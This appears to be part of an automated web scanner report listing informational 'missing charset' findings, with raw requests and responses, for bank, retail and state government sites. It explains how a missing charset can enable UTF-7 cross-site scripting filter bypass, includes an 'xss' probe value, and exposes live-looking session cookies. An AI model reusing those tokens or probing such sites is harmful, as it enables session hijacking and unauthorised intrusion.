Server: Apache
Last-Modified: Tue, 05 Jul 2011 20:02:38 GMT
ETag: "3bfc2d-36cd-4e136dde"
Accept-Ranges: bytes
Content-Length: 14029
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><!-- InstanceBegin template="/Temp
...[SNIP]...
</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />

<meta name="keywords" content="cross domain,network security,cybersecurity,secureoffice,Security Blanket,trusted gateway;Simshield,Webshield,certification,accreditation,RedHat,Linux,guard,multileve
...[SNIP]...
<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" />
<meta name="robots" http-equiv="Content-Type" content="/robots.txt" />

<link rel="stylesheet" type="text/css" href="/css/TGS_reset.css" media="screen">
...[SNIP]...

25. HTML does not specify charset previous next
There are 24 instances of this issue:

http://blastercorp.com/
http://fls.doubleclick.net/activityi
https://store.popcap.com/js/s_code.php
http://ucc.state.ri.us/CorpSearch/CorpSearchEntityList.asp
http://ucc.state.ri.us/CorpSearch/CorpSearchInput.asp
http://ucc.state.ri.us/loginsystem/login_form.asp
http://ucc.state.ri.us/ucc/uccmenu.asp
http://wallst.jpmorganchase.com/chase/services/MultiQuote/MultiQuote.asp
https://www.chase.com/online/Home/article/Homepage_pixel_frameset.htm
http://www.citizencorps.gov/includes/facts.json
http://www.ct.gov/favicon.ico
http://www.homedepot.com/hdus/en_US/DTCCOM/HomePage/Fragments/BB_Hero.htm
http://www.interactivemediaawards.com/favicon.ico
http://www.jpmorgan.com/
http://www.lowes.com/wcsstore/B2BDirectStorefrontAssetStore/Mexico/img/back_content.png
http://www.lowes.com/wcsstore/B2BDirectStorefrontAssetStore/Mexico/img/bk_menu_bt_over.jpg
https://www.lowes.com/MContent/Structured/MastheadArea/help_center/my_profile.html
https://www.lowes.com/MContent/Structured/MastheadArea/projects/bath.html
https://www.lowes.com/MContent/Structured/MastheadArea/projects/kitchen.html
https://www.lowes.com/MContent/Structured/MastheadArea/projects/laundry.html
http://www.popcap.com/js/s_code.php
http://www.readability.com/embed.js
http://www.readability.com/static/embed/embed.html
http://www2.tmc.state.ri.us/

Issue description

If a web response states that it contains HTML content but does not specify a character set, then the browser may analyse the HTML and attempt to determine which character set it appears to be using. Even if the majority of the HTML actually employs a standard character set such as UTF-8, the presence of non-standard characters anywhere in the response may cause the browser to interpret the content using a different character set. This can have unexpected results, and can lead to cross-site scripting vulnerabilities in which non-standard encodings like UTF-7 can be used to bypass the application's defensive filters.

In most cases, the absence of a charset directive does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing HTML content, the application should include within the Content-type header a directive specifying a standard recognised character set, for example charset=ISO-8859-1.

25.1. http://blastercorp.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blastercorp.com
Path:	/

Request

GET / HTTP/1.1
Host: blastercorp.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Length: 823
Content-Type: text/html
Content-Location: http://blastercorp.com/index.html
Last-Modified: Thu, 24 Feb 2011 15:00:23 GMT
Accept-Ranges: bytes
ETag: "1a8b99033d4cb1:250b"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 12 Jul 2011 16:41:38 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Refres
...[SNIP]...

25.2. http://fls.doubleclick.net/activityi previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://fls.doubleclick.net
Path:	/activityi

Request

Response

25.3. https://store.popcap.com/js/s_code.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://store.popcap.com
Path:	/js/s_code.php

Request

Response

25.4. http://ucc.state.ri.us/CorpSearch/CorpSearchEntityList.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ucc.state.ri.us
Path:	/CorpSearch/CorpSearchEntityList.asp

Request

POST /CorpSearch/CorpSearchEntityList.asp?ReadFromDB=True&UpdateAllowed= HTTP/1.1
Host: ucc.state.ri.us
Proxy-Connection: keep-alive
Referer: http://ucc.state.ri.us/CorpSearch/CorpSearchInput.asp
Content-Length: 448
Cache-Control: max-age=0
Origin: http://ucc.state.ri.us
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDQSDTSCTB=AKNKPFLBFPLJPOODINBOEFIF

ActiveFlagCrit=Y&SearchType=E&EntityName=xss&EntitySearchMethod=B&FEIN=&FilingNumber=&IndividualSearchMethod=B&FirstName=&MiddleName=&LastName=&AgentSearchMethod=B&AgentName=&Address=&Purpose=&lstDisp
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Wed, 13 Jul 2011 00:47:50 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 8512
Content-Type: text/html
Cache-control: private

<HTML>

<HEAD>
<Title>State of Rhode Island and Providence Plantations - Public Browse and Search</title>

<style type="text/css">
.label {
font-family: "Courier New", Courier, monospac
...[SNIP]...

25.5. http://ucc.state.ri.us/CorpSearch/CorpSearchInput.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ucc.state.ri.us
Path:	/CorpSearch/CorpSearchInput.asp

Request

Response

25.6. http://ucc.state.ri.us/loginsystem/login_form.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ucc.state.ri.us
Path:	/loginsystem/login_form.asp

Request

Response

25.7. http://ucc.state.ri.us/ucc/uccmenu.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ucc.state.ri.us
Path:	/ucc/uccmenu.asp

Request

Response

25.8. http://wallst.jpmorganchase.com/chase/services/MultiQuote/MultiQuote.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://wallst.jpmorganchase.com
Path:	/chase/services/MultiQuote/MultiQuote.asp

Request

GET /chase/services/MultiQuote/MultiQuote.asp?symbols=jpm&requestMethod=getFastQuote&realtime=0&outputFormat=json HTTP/1.1
Host: wallst.jpmorganchase.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.jpmorganchase.com/corporate/Home/home.htm

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Tue, 12 Jul 2011 16:27:20 GMT
Content-Length: 73
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
P3P: CP="PHY ONL UNI PUR FIN COM NAV INT DEM STA HEA CUR ADM DEV OUR IND"

var FastQuote = {"FastQuote":[{"symbol":"jpm","code":200,"last":39.67}]};

25.9. https://www.chase.com/online/Home/article/Homepage_pixel_frameset.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.chase.com
Path:	/online/Home/article/Homepage_pixel_frameset.htm

Request

Response

25.10. http://www.citizencorps.gov/includes/facts.json previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.citizencorps.gov
Path:	/includes/facts.json

Request

GET /includes/facts.json HTTP/1.1
Host: www.citizencorps.gov
Proxy-Connection: keep-alive
Referer: http://www.citizencorps.gov/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Wed, 13 Jul 2011 00:39:45 GMT
Server: Apache
Last-Modified: Mon, 01 Feb 2010 21:02:17 GMT
ETag: "169b668-322-4ce04840"
Accept-Ranges: bytes
Content-Length: 802
Content-Type: text/html

{
   didYouKnow :
   [
    "42\% of Americans expect to need help with evacuation prior to a disaster.",
    "56\% of Americans have stocked disaster preparedness supplies.",
    "Only 10\% of people w
...[SNIP]...

25.11. http://www.ct.gov/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ct.gov
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
Host: www.ct.gov
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=64328189.1006709634.1310517572.1310517572.1310517572.1; __utmb=64328189.1.10.1310517572; __utmc=64328189; __utmz=64328189.1310517572.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 404
Connection: close
Date: Wed, 13 Jul 2011 00:39:36 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 1416
Content-Type: text/html
Cache-control: private

<html>
<head>
   <Title>DSF</Title>
</head>
<body bgcolor=white>

       <center>
           <img src='../assets/templates/0/images/failover_header.gif'><table border="0" cellpadding="0" cellspacing="0"
...[SNIP]...

25.12. http://www.homedepot.com/hdus/en_US/DTCCOM/HomePage/Fragments/BB_Hero.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.homedepot.com
Path:	/hdus/en_US/DTCCOM/HomePage/Fragments/BB_Hero.htm

Request

GET /hdus/en_US/DTCCOM/HomePage/Fragments/BB_Hero.htm HTTP/1.1
Host: www.homedepot.com
Proxy-Connection: keep-alive
Referer: http://www.homedepot.com/
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/html, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26FCF442851D317F-4000010680023189[CE]; 40M3=3Qym2Nw8SPgeWsRL3W1Fo9bIc5fAog7Qw8GtDUzcMgFyqP-BqANMzbg; RES_TRACKINGID=345519762253388; THD_CACHE_NAV_PERSIST=C10%7e96%5f%7eC10%5fEXP%7e; WC_PERSISTENT=JOV9mEDH97qHDqOENJ2a%2foByFXM%3d%0a%3b2011%2d06%2d16+08%3a16%3a48%2e923%5f1308225529140%2d4164%5f10051%5f287408220%2c%2d1%2cUSD%5f10051; THD_PERSIST=C4%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC4%5fEXP%3d1360065529%3a%3bC5%3d7000000000002025830%3a%3bC5%5fEXP%3d1360065529%3a%3bC24%3d20018%3a%3bC24%5fEXP%3d1360065529%3a%3bC25%3dccaita7t%2fWC%5fTHD2%5fccaita7t%2f1310488436587%3a%3bC25%5fEXP%3d1362328436%3a%3bC27%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC27%5fEXP%3d1360065529%3a%3bC33%3d2583%3a%3bC33%5fEXP%3d1360065529; THD_CACHE_NAV_SESSION=C20%7e8119%5f%7eC20%5fEXP%7e%5f%7eC22%7e2583%5f%7eC22%5fEXP%7e; Coradiantuserid=82f95932-9eee-1ce7-9678-00e0ed0ed026; NSC_mc-wt-qs-80-w1-psjhjo-xxx2=ffffffffc3a00a0245525d5f4f58455e445a4a422991; THD_SESSION=C6%3D%7B%22I1%22%3A%220%22%2C%22F1%22%3A%22true%22%2C%22F2%22%3A%22false%22%2C%22D1%22%3A%22%240.00%22%2C%22D2%22%3A%22%24249.00%22%7D%3A%3BC6_EXP%3D-1%3A%3BC34%3D1.0-2.1-3.0-4.0-5.0%3A%3BC34_EXP%3D-1; s_pers=%20s_campaign%3Dno%2520value%7C1310490339841%3B%20s_prevPage%3Dhomepage%7C1310490339843%3B%20p_30%3DHome%2520Page%7C1310490339844%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_cmpnm%3Dundefined%3B%20s_sq%3D%3B; RES_SESSIONID=877035136567428; ResonanceSegment=1; FSRCookie=ForeseeLoyalty=1

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Wed, 06 Jul 2011 19:41:39 GMT
ETag: "1d6a7c-1c3b-c9fd42c0"
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 7227
Content-Type: text/html
Expires: Tue, 12 Jul 2011 16:35:53 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 12 Jul 2011 16:35:53 GMT
Connection: close

<div class="hero_slide dogear_right" rel="2" style="background-image:url('/hdus/en_US/DTCCOM/HomePage/Images/BB_hero2.jpg')"><div id="hero_modal_wrapper">
<div id="hero_loaded_content">
<!
...[SNIP]...

25.13. http://www.interactivemediaawards.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.interactivemediaawards.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
Host: www.interactivemediaawards.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCQSSDARB=IBIMKCDDJFDAKOGAGLOBEKKF; SIFR-PREFETCHED=true

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 13 Jul 2011 00:36:37 GMT
Content-Length: 243

<html><body style="margin: 0"><script type="text/javascript">document.write('<iframe style="width: 100%; height: 100%; border: 0;" src="http://searchmagnified.com/?dn=' + location.hostname + '&pid=7PO
...[SNIP]...

25.14. http://www.jpmorgan.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.jpmorgan.com
Path:	/

Request

Response

25.15. http://www.lowes.com/wcsstore/B2BDirectStorefrontAssetStore/Mexico/img/back_content.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.lowes.com
Path:	/wcsstore/B2BDirectStorefrontAssetStore/Mexico/img/back_content.png

Request

GET /wcsstore/B2BDirectStorefrontAssetStore/Mexico/img/back_content.png HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.lowes.com
Cookie: MBJT=3npJGdCEGA39cXndCp1mhBo99ohPFg9QUCqlPZDTH03dVbJkclo_8Rw; akaau=1310508130~id=1c4ed4773ab2b33abb47cb68f3f868cd

Response

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server
Last-Modified: Thu, 23 Jun 2011 13:44:17 GMT
Accept-Ranges: bytes
Content-Length: 48963
Content-Type: text/html
Expires: Tue, 12 Jul 2011 21:32:35 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 12 Jul 2011 21:32:35 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<hea
...[SNIP]...

25.16. http://www.lowes.com/wcsstore/B2BDirectStorefrontAssetStore/Mexico/img/bk_menu_bt_over.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.lowes.com
Path:	/wcsstore/B2BDirectStorefrontAssetStore/Mexico/img/bk_menu_bt_over.jpg

Request

GET /wcsstore/B2BDirectStorefrontAssetStore/Mexico/img/bk_menu_bt_over.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.lowes.com
Cookie: MBJT=3npJGdCEGA39cXndCp1mhBo99ohPFg9QUCqlPZDTH03dVbJkclo_8Rw; akaau=1310508130~id=1c4ed4773ab2b33abb47cb68f3f868cd

Response

25.17. https://www.lowes.com/MContent/Structured/MastheadArea/help_center/my_profile.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.lowes.com
Path:	/MContent/Structured/MastheadArea/help_center/my_profile.html

Request

GET /MContent/Structured/MastheadArea/help_center/my_profile.html HTTP/1.1
Host: www.lowes.com
Connection: keep-alive
Referer: https://www.lowes.com/webapp/wcs/stores/servlet/LogonForm?langId=-1&storeId=10151&catalogId=10051&krypto=w37ixU9mxd51c2GEFG7BpBTiHMF%2BPtrjg%2F5ZFfDHXjuTogRqSuGR4efV6fa7g5SaSXQQW3naq2iX%0AFpd3O3L2OA%3D%3D
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/html, */*; q=0.01
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cmTPSet=Y; MBJT=3X-GjNMfSpxZg4AcdSyRyWoKGL1SXlVlZak_4S69Ys_sq5o29-TPKZg; selectedStore1=Lowe's Of Brooklyn## NY|1674|4|11215|no|Y|118 2nd Avenue|Brooklyn|M-Sa 6 Am - Midnight## Su 8 Am - 10 Pm|(718) 249-1151|(718) 249-1152|ZK; WC_SESSION_ESTABLISHED=true; WC_PERSISTENT=lqKgTvyXs59OqiWHtkQYsR6yqww%3d%0a%3b2011%2d07%2d12+17%3a30%3a53%2e805%5f1310506253758%2d32392%5f10151%5f%2d1002%2c%2d1%2cUSD%5f10151; WC_ACTIVEPOINTER=%2d1%2c10151; WC_USERACTIVITY_-1002=%2d1002%2c10151%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2czavDyvRAPLOMLbNZ9U%2brj7uHCuulaXU18t%2fO%2fSx3lFn%2f45taoGYDYucxz4%2fp6B8TseYfU77Cle%2fm%0ab0yPR1ZdZKqdzv4K90EN5LABrTDJqw%2bv3BQL%2fdgBlrAW4pfUJIrUfYSaLoZuCgSo0qJaRQKNfA%3d%3d; WC_GENERIC_ACTIVITYDATA=[2896981527%3atrue%3afalse%3a0%3aWsNL%2fRHH6YRulRJGHQvbU%2bbK20A%3d][com.ibm.commerce.context.base.BaseContext|10151%26%2d1002%26%2d1002%26%2d1][com.ibm.commerce.catalog.businesscontext.CatalogContext|10051%26null%26false%26false%26false][com.ibm.commerce.context.globalization.GlobalizationContext|%2d1%26USD%26%2d1%26USD][com.ibm.commerce.context.entitlement.EntitlementContext|10005%2610005%26null%26%2d2000%26null%26null%26null][com.ibm.commerce.context.experiment.ExperimentContext|null][CTXSETNAME|Store][com.ibm.commerce.context.audit.AuditContext|null][com.ibm.commerce.gifregistry.context.GiftRegistryContext|null%26null%26null]; LowesSearchSessionFacade=%7B%22articlesPerPage%22%3A0%2C%22productsPerPage%22%3A0%7D; catSearchResult=|/pl_Flooring_4294934373_4294937087_; TSdcd8fd=42184ef523475358e3f266b98a3eff98b936a614cb0d4b614e1cbbd2; JSESSIONID=0000bJcLADoQIGfUv01WZVkpsK7:14e1grfqa; BIGipServerproduction-asm-onlineA.lowes.com-tcp443=217583788.47873.0000; akaau=1310518355~id=24041af9526315cfad1662ac5edcd35c; stop_mobi=yes; TS176ebc=5d870c16fab6d71eaef6689f408ec163952fb28614d407a34e1ce3a6; cmSessionDepth=5; lowes-prefs={"zipin":{"show":false},"tollfree":{"show":true}}; fsr.s={"v":1,"rid":"1310506289401_163212","ru":"http://www.lowes.com/?mastheadURL=TopCategoriesDisplayView&firstReferURL=http%3A%2F%2Fwww.lowes.com%2F&qvRedirect=&langId=-1&findStoreErrorURL=StoreLocatorDisplayView&catalogId=10051&masthead=true&zipCode=10010&Ntt=&NttParam=&storeId=10151&selectedLocalStoreBeanArray=%5Bcom.lowes.commerce.storelocator.beans.LocatorStoreBean%404e575949%2C+com.lowes.commerce.storelocator.beans.LocatorStoreBean%404e75d949%2C+com.lowes.commerce.storelocator.beans.LocatorStoreBean%404e955949%2C+com.lowes.commerce.storelocator.beans.LocatorStoreBean%403d749949%2C+com.lowes.commerce.storelocator.beans.LocatorStoreBean%403d941949%5D&URL=TopCategoriesDisplayView&y=0&isQvSearch=&x=0","r":"www.lowes.com","st":"","to":3,"c":"https://www.lowes.com/webapp/wcs/stores/servlet/LogonForm\nFpd3O3L2OA==","pv":3,"lc":{"d0":{"v":3,"s":false,"e":1}},"cd":0,"sd":0}

Response

HTTP/1.1 200 OK
Last-Modified: Fri, 12 Nov 2010 20:10:44 GMT
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 2793
Expires: Wed, 13 Jul 2011 00:23:14 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 13 Jul 2011 00:23:14 GMT
Connection: keep-alive
Vary: Accept-Encoding

<h2>My Profile Help</h2>
<div class="cnt">
   <div class="grid_3 npc_links topic_links">
       <h3>My Profile</h3>
       <ul>
           <li><a name="MASTHEAD_2_recover_password" href="https://www.lowes.com/webapp/wcs/
...[SNIP]...

25.18. https://www.lowes.com/MContent/Structured/MastheadArea/projects/bath.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.lowes.com
Path:	/MContent/Structured/MastheadArea/projects/bath.html

Request

GET /MContent/Structured/MastheadArea/projects/bath.html HTTP/1.1
Host: www.lowes.com
Connection: keep-alive
Referer: https://www.lowes.com/webapp/wcs/stores/servlet/LogonForm?langId=-1&storeId=10151&catalogId=10051&krypto=w37ixU9mxd51c2GEFG7BpBTiHMF%2BPtrjg%2F5ZFfDHXjuTogRqSuGR4efV6fa7g5SaSXQQW3naq2iX%0AFpd3O3L2OA%3D%3D
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/html, */*; q=0.01
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cmTPSet=Y; MBJT=3X-GjNMfSpxZg4AcdSyRyWoKGL1SXlVlZak_4S69Ys_sq5o29-TPKZg; selectedStore1=Lowe's Of Brooklyn## NY|1674|4|11215|no|Y|118 2nd Avenue|Brooklyn|M-Sa 6 Am - Midnight## Su 8 Am - 10 Pm|(718) 249-1151|(718) 249-1152|ZK; WC_SESSION_ESTABLISHED=true; WC_PERSISTENT=lqKgTvyXs59OqiWHtkQYsR6yqww%3d%0a%3b2011%2d07%2d12+17%3a30%3a53%2e805%5f1310506253758%2d32392%5f10151%5f%2d1002%2c%2d1%2cUSD%5f10151; WC_ACTIVEPOINTER=%2d1%2c10151; WC_USERACTIVITY_-1002=%2d1002%2c10151%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2czavDyvRAPLOMLbNZ9U%2brj7uHCuulaXU18t%2fO%2fSx3lFn%2f45taoGYDYucxz4%2fp6B8TseYfU77Cle%2fm%0ab0yPR1ZdZKqdzv4K90EN5LABrTDJqw%2bv3BQL%2fdgBlrAW4pfUJIrUfYSaLoZuCgSo0qJaRQKNfA%3d%3d; WC_GENERIC_ACTIVITYDATA=[2896981527%3atrue%3afalse%3a0%3aWsNL%2fRHH6YRulRJGHQvbU%2bbK20A%3d][com.ibm.commerce.context.base.BaseContext|10151%26%2d1002%26%2d1002%26%2d1][com.ibm.commerce.catalog.businesscontext.CatalogContext|10051%26null%26false%26false%26false][com.ibm.commerce.context.globalization.GlobalizationContext|%2d1%26USD%26%2d1%26USD][com.ibm.commerce.context.entitlement.EntitlementContext|10005%2610005%26null%26%2d2000%26null%26null%26null][com.ibm.commerce.context.experiment.ExperimentContext|null][CTXSETNAME|Store][com.ibm.commerce.context.audit.AuditContext|null][com.ibm.commerce.gifregistry.context.GiftRegistryContext|null%26null%26null]; LowesSearchSessionFacade=%7B%22articlesPerPage%22%3A0%2C%22productsPerPage%22%3A0%7D; catSearchResult=|/pl_Flooring_4294934373_4294937087_; TSdcd8fd=42184ef523475358e3f266b98a3eff98b936a614cb0d4b614e1cbbd2; JSESSIONID=0000bJcLADoQIGfUv01WZVkpsK7:14e1grfqa; BIGipServerproduction-asm-onlineA.lowes.com-tcp443=217583788.47873.0000; akaau=1310518355~id=24041af9526315cfad1662ac5edcd35c; stop_mobi=yes; TS176ebc=5d870c16fab6d71eaef6689f408ec163952fb28614d407a34e1ce3a6; cmSessionDepth=5; lowes-prefs={"zipin":{"show":false},"tollfree":{"show":true}}; fsr.s={"v":1,"rid":"1310506289401_163212","ru":"http://www.lowes.com/?mastheadURL=TopCategoriesDisplayView&firstReferURL=http%3A%2F%2Fwww.lowes.com%2F&qvRedirect=&langId=-1&findStoreErrorURL=StoreLocatorDisplayView&catalogId=10051&masthead=true&zipCode=10010&Ntt=&NttParam=&storeId=10151&selectedLocalStoreBeanArray=%5Bcom.lowes.commerce.storelocator.beans.LocatorStoreBean%404e575949%2C+com.lowes.commerce.storelocator.beans.LocatorStoreBean%404e75d949%2C+com.lowes.commerce.storelocator.beans.LocatorStoreBean%404e955949%2C+com.lowes.commerce.storelocator.beans.LocatorStoreBean%403d749949%2C+com.lowes.commerce.storelocator.beans.LocatorStoreBean%403d941949%5D&URL=TopCategoriesDisplayView&y=0&isQvSearch=&x=0","r":"www.lowes.com","st":"","to":3,"c":"https://www.lowes.com/webapp/wcs/stores/servlet/LogonForm\nFpd3O3L2OA==","pv":3,"lc":{"d0":{"v":3,"s":false,"e":1}},"cd":0,"sd":0}

Response

HTTP/1.1 200 OK
Last-Modified: Fri, 12 Nov 2010 20:11:24 GMT
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 3663
Expires: Wed, 13 Jul 2011 00:23:21 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 13 Jul 2011 00:23:21 GMT
Connection: keep-alive
Vary: Accept-Encoding

<h2>Featured Bath Projects</h2><ul class="bucket projects"> <li><a name="MASTHEAD_2_make_simple_toilet_repairs" href="/cd_Simple+Toilet+Repairs_1285702600_"><img src="/images/projects/bath1.jpg" alt
...[SNIP]...

25.19. https://www.lowes.com/MContent/Structured/MastheadArea/projects/kitchen.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.lowes.com
Path:	/MContent/Structured/MastheadArea/projects/kitchen.html

Request

GET /MContent/Structured/MastheadArea/projects/kitchen.html HTTP/1.1
Host: www.lowes.com
Connection: keep-alive
Referer: https://www.lowes.com/webapp/wcs/stores/servlet/LogonForm?langId=-1&storeId=10151&catalogId=10051&krypto=w37ixU9mxd51c2GEFG7BpBTiHMF%2BPtrjg%2F5ZFfDHXjuTogRqSuGR4efV6fa7g5SaSXQQW3naq2iX%0AFpd3O3L2OA%3D%3D
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/html, */*; q=0.01
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
